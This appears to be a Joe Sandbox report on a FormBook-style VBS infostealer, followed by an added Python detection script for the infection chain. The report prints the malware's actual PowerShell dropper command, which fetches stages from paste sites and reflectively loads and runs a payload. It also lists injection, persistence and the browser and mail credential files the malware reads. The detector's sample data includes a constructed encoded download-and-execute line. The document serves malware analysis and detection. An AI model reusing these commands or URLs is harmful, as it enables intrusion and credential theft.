                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtClose: Direct from: 0x77D62B6C
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtAllocateVirtualMemory: Direct from: 0x77D63C9C
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtSetInformationProcess: Direct from: 0x77D62C5C
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtProtectVirtualMemory: Direct from: 0x77D62F9C
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtNotifyChangeKey: Direct from: 0x77D63C2C
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtWriteVirtualMemory: Direct from: 0x77D62E3C
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtCreateMutant: Direct from: 0x77D635CC
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtResumeThread: Direct from: 0x77D636AC
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtMapViewOfSection: Direct from: 0x77D62D1C
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtAllocateVirtualMemory: Direct from: 0x77D62BFC
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtAllocateVirtualMemory: Direct from: 0x77D62BEC
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtSetInformationThread: Direct from: 0x77D62ECC
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtQueryInformationToken: Direct from: 0x77D62CAC
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtCreateFile: Direct from: 0x77D62FEC
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtOpenFile: Direct from: 0x77D62DCC
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtTerminateThread: Direct from: 0x77D62FCC
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtOpenKeyEx: Direct from: 0x77D62B9C
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: NULL target: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exe protection: execute and read and write
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeSection loaded: NULL target: C:\Windows\SysWOW64\iexpress.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: NULL target: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exe protection: read write
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: NULL target: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\iexpress.exeThread register set: target process: 5468
                  Source: C:\Windows\SysWOW64\iexpress.exeThread APC queued: target process: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1279008
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\user\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = '[long base64-encoded command-line blob omitted]'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exe | Process created: C:\Windows\SysWOW64\iexpress.exe "C:\Windows\SysWOW64\iexpress.exe"
                  Source: C:\Windows\SysWOW64\iexpress.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Source: DmMVOWsP1JSI77P.exe, 0000000B.00000002.2229058882.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 0000000B.00000000.1183871673.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000000.1337559298.00000000018E1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                  Source: DmMVOWsP1JSI77P.exe, 0000000B.00000002.2229058882.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 0000000B.00000000.1183871673.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000000.1337559298.00000000018E1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                  Source: DmMVOWsP1JSI77P.exe, 0000000B.00000002.2229058882.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 0000000B.00000000.1183871673.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000000.1337559298.00000000018E1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                  Source: DmMVOWsP1JSI77P.exe, 0000000B.00000002.2229058882.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 0000000B.00000000.1183871673.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000000.1337559298.00000000018E1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                  Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000C.00000002.2229860985.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.2229410762.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.2226580404.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1277774749.0000000002860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000B.00000002.2229866615.0000000002E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1258834116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1262010486.0000000001930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000014.00000002.2232234775.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\SysWOW64\iexpress.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\SysWOW64\iexpress.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                  Source: C:\Windows\SysWOW64\iexpress.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                  Source: C:\Windows\SysWOW64\iexpress.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\SysWOW64\iexpress.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\SysWOW64\iexpress.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                  Source: C:\Windows\SysWOW64\iexpress.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\SysWOW64\iexpress.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\SysWOW64\iexpress.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                  Remote Access Functionality

                  Source: Yara match | File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000C.00000002.2229860985.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.2229410762.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.2226580404.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1277774749.0000000002860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000B.00000002.2229866615.0000000002E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1258834116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1262010486.0000000001930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000014.00000002.2232234775.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  ATT&CK matrix (one column per tactic; a leading number is the report's signature count for that technique):

                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | 121 Scripting | Valid Accounts | 1 Exploitation for Client Execution | 121 Scripting | 1 Abuse Elevation Control Mechanism | 111 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 123 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | 11 Scheduled Task/Job | 11 Scheduled Task/Job | 512 Process Injection | 4 Obfuscated Files or Information | Security Account Manager | 131 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | 4 PowerShell | Login Hook | 11 Scheduled Task/Job | 1 Software Packing | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 4 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 41 Virtualization/Sandbox Evasion | SSH | Keylogging | 5 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 41 Virtualization/Sandbox Evasion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 512 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  Behavior Graph ID: 1665559; Sample: PURCHASE OKK.vbs; Startdate: 15/04/2025; Architecture: WINDOWS; Score: 100. The graph, rendered as a process tree with the signatures and network contacts attached to each node:

                  Sample start
                    DNS: www.rtprubikslot-asli.xyz (Performs DNS queries to domains with low reputation); pastebin.com (Connects to a pastebin service (likely for C&C)); 19 other IPs or domains
                    Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Yara detected FormBook; 9 other signatures
                    |- wscript.exe
                    |    Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Uses schtasks.exe or at.exe to add and modify task schedules; 2 other signatures
                    |    |- powershell.exe
                    |    |    Signatures: Suspicious powershell command line found; Encrypted powershell cmdline option found; Bypasses PowerShell execution policy; Found suspicious powershell code related to unpacking or dynamic code loading
                    |    |    |- conhost.exe
                    |    |    |- powershell.exe
                    |    |         Network: paste.ee 23.186.113.60 (ports 443, 49694, 49696; KLAYER-GLOBALNL, Reserved); pastebin.com 104.22.69.199 (ports 443, 49693, 49695; CLOUDFLARENETUS, United States)
                    |    |         Dropped: C:\Users\user\AppData\Local\Temp\dll03.ps1 (Unicode)
                    |    |         Signature: Potential dropper URLs found in powershell memory
                    |    |         |- powershell.exe
                    |    |              Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
                    |    |              |- MSBuild.exe
                    |    |                   Signature: Maps a DLL or memory area into another process
                    |    |                   |- DmMVOWsP1JSI77P.exe (injected)
                    |    |                        Signatures: Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR)
                    |    |                        |- iexpress.exe
                    |    |                             Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                    |    |                             |- DmMVOWsP1JSI77P.exe (injected)
                    |    |                             |    Network: www.samlib.ru 81.176.66.171 (ports 49724, 80; RTCOMM-ASRU, Russian Federation); reviewsonline.shop 84.32.84.32 (ports 49958, 49964, 49965; NTT-LT-ASLT, Lithuania); 4 other IPs or domains
                    |    |                             |    Signature: Found direct / indirect Syscall (likely to bypass EDR)
                    |    |                             |- firefox.exe
                    |    |- schtasks.exe
                    |    |    |- conhost.exe
                    |    |- schtasks.exe
                    |         |- conhost.exe
                    |- svchost.exe
                         Network: 127.0.0.1
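                  The chain in the behavior graph (script host spawning PowerShell with an encoded command and an execution-policy bypass, a paste site as the stage-two source, schtasks for persistence, and MSBuild.exe as the injection target) is what a detection engineer would want to match in process-creation telemetry. The following is an added example written for this page, not code from the Joe Sandbox report: it decodes -EncodedCommand payloads, looks for paste-site domains forward and reversed (string reversal is a common obfuscation for such URLs), and walks the parent chain. The event schema and SAMPLE_EVENTS are constructed to mirror the graph; the task name, the reversed-URL first stage and the paste path are hypothetical.

```python
# Added example (not Joe Sandbox code): detection logic for the script host ->
# PowerShell -> paste site -> MSBuild.exe chain shown in the behavior graph.
# Event schema and SAMPLE_EVENTS are constructed; task name and paste path are hypothetical.
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

PASTE_DOMAINS = ("pastebin.com", "paste.ee")   # paste sites contacted in the graph
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
INJECTION_HOSTS = ("msbuild.exe",)              # signed host used as injection target

@dataclass
class ProcEvent:                # process-creation event (Sysmon EID 1 / 4688 style)
    pid: int
    ppid: int
    image: str                  # executable base name, e.g. "powershell.exe"
    cmdline: str

def encode_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand/-enc/-ec/-e, or None."""
    m = re.search(r"(?i)(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def paste_site_refs(text: str) -> List[str]:
    """Paste-site domains present as-is or reversed (string reversal is a common obfuscation)."""
    low, hits = text.lower(), []
    for dom in PASTE_DOMAINS:
        if dom in low:
            hits.append(dom)
        if dom[::-1] in low:
            hits.append(dom + " (reversed)")
    return hits

def has_script_host_ancestor(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> bool:
    """Walk the parent chain looking for wscript.exe/cscript.exe (cycle-safe)."""
    seen, cur = set(), by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        if cur.image.lower() in SCRIPT_HOSTS:
            return True
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return False

def analyze(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Return {pid: [finding, ...]} for every process matching part of the chain."""
    by_pid = {e.pid: e for e in events}
    findings: Dict[int, List[str]] = {}
    def add(pid: int, msg: str) -> None:
        findings.setdefault(pid, []).append(msg)
    for ev in events:
        img, low = ev.image.lower(), ev.cmdline.lower()
        parent = by_pid.get(ev.ppid)
        pimg = parent.image.lower() if parent else ""
        if img == "powershell.exe" and has_script_host_ancestor(ev, by_pid):
            add(ev.pid, "powershell under a script host")
            if re.search(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", low):
                add(ev.pid, "execution policy bypass")
            decoded = decode_encoded_command(ev.cmdline)
            if decoded is not None:
                add(ev.pid, "encoded command")
            for dom in paste_site_refs(ev.cmdline + " " + (decoded or "")):
                add(ev.pid, "paste-site reference: " + dom)
        if img == "schtasks.exe" and pimg in SCRIPT_HOSTS and "/create" in low:
            add(ev.pid, "scheduled task created by a script host")
        if img in INJECTION_HOSTS and pimg == "powershell.exe":
            add(ev.pid, ev.image + " launched by powershell (injection target)")
    return findings

# Constructed first stage: reversed paste.ee URL rebuilt at run time and fetched with IEX.
_STAGE1 = ("$u='ee.etsap//:sptth'; IEX (New-Object Net.WebClient)"
           ".DownloadString(($u[-1..-($u.Length)] -join '') + '/r/dll03')")
VBS = r"C:\Users\user\AppData\Local\Temp\PURCHASE OKK.vbs"
SAMPLE_EVENTS = [   # constructed to mirror the behavior graph; not the report's telemetry
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(13, 100, "wscript.exe", 'wscript.exe "%s"' % VBS),
    ProcEvent(19, 13, "powershell.exe",
              "powershell.exe -ep bypass -nop -w hidden -enc " + encode_command(_STAGE1)),
    ProcEvent(22, 13, "schtasks.exe",
              'schtasks.exe /create /sc minute /mo 2 /tn Update /tr "wscript.exe %s"' % VBS),
    ProcEvent(26, 19, "powershell.exe", "powershell.exe -nop -w hidden -ep bypass"),
    ProcEvent(37, 26, "powershell.exe",
              r"powershell.exe -nop -ep bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1"),
    ProcEvent(40, 37, "MSBuild.exe", "MSBuild.exe"),
    ProcEvent(200, 100, "powershell.exe", "powershell.exe -NoProfile -Command Get-Date"),  # benign
]

if __name__ == "__main__":
    for pid, notes in sorted(analyze(SAMPLE_EVENTS).items()):
        print(pid, "; ".join(notes))
```

                  The parent walk matters more than any single string match: the second and third powershell.exe instances in the graph carry no encoded command themselves, yet still descend from wscript.exe, and MSBuild.exe is only suspicious because its parent is PowerShell. Decoding the payload before matching is what catches the reversed paste-site domain, which never appears in the raw command line. The benign PowerShell launched from explorer.exe produces no findings.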
